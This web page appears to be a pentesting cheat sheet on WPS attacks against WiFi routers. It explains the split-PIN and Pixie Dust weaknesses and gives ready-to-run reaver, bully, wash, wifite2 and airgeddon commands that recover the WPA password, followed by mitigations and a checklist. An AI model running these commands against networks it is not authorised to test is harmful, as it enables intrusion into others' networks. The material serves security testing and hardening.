Skip to content

WPS Attacks

WPS (WiFi Protected Setup) is the feature that lets you connect devices to WiFi by pressing a button or entering an 8-digit PIN, to avoid typing the long password. The problem: that PIN is a weak point that, badly implemented, lets you recover the network’s WPA password without cracking the handshake. It’s one of the most rewarding WiFi attacks when WPS is active, because it completely avoids offline key cracking.

The 8-digit PIN isn’t validated as a whole: it’s checked in two halves (the first 4 digits and the next 3; the 8th is a checksum). That drastically reduces the search space: from 10^8 to ~11,000 attempts at most. And with Pixie Dust, often a single interaction suffices.

wash -i wlan0mon # lists APs with WPS enabled, their state, and if "locked"
# key columns: WPS version, WPS locked (if not locked, attackable)
# brute-force the PIN (by the two halves)
reaver -i wlan0mon -b <BSSID> -c <channel> -vv
bully -b <BSSID> -c <channel> wlan0mon
# on recovering the PIN -> reaver also returns the WPA password (PSK)

Slow if the AP isn’t misconfigured (can take hours, and some lock after several attempts: “WPS locked”).

Pixie Dust exploits a weakness in how some APs generate the WPS exchange nonces: it lets you compute the PIN offline from a single transaction, in seconds/minutes instead of hours:

reaver -i wlan0mon -b <BSSID> -c <channel> -K 1 -vv # -K enables Pixie Dust
# or bully with --pixiewps / airgeddon (WPS menu -> Pixie Dust)

Many chipsets (Realtek, Ralink, old Broadcom) are vulnerable → PIN and password in minutes.

# some APs accept an empty PIN or have default/BSSID-derivable PINs
# databases of default PINs (by vendor/MAC)
# airgeddon and wifite integrate these checks
wifite2 # automates WPS (Pixie+bruteforce), WPA handshake, PMKID -> all-in-one
airgeddon # interactive menu with all WPS variants
reaver/bully + pixiewps # the low-level pieces
  • Disable WPS entirely on the router — the definitive mitigation, and almost always unnecessary.
  • If you can’t, ensure it’s not vulnerable to Pixie Dust (patched firmware) and that it locks after failed attempts (WPS lock).
  • Don’t use default PINs; prefer the button method (PBC) on demand only, not a permanent PIN.
  • A strong WPA password doesn’t protect you if WPS is active and vulnerable: WPS hands it over directly.
  • Discover APs with WPS enabled (wash) and whether locked
  • Pixie Dust first (reaver -K / pixiewps) — fast
  • PIN bruteforce (reaver/bully) if Pixie fails
  • Null PIN / default PINs by vendor
  • Recover the WPA password from the PIN
  • Automate with wifite2/airgeddon
  • Blue: WPS disabled or patched + lock?
  • Document that WPS hands over the key without cracking it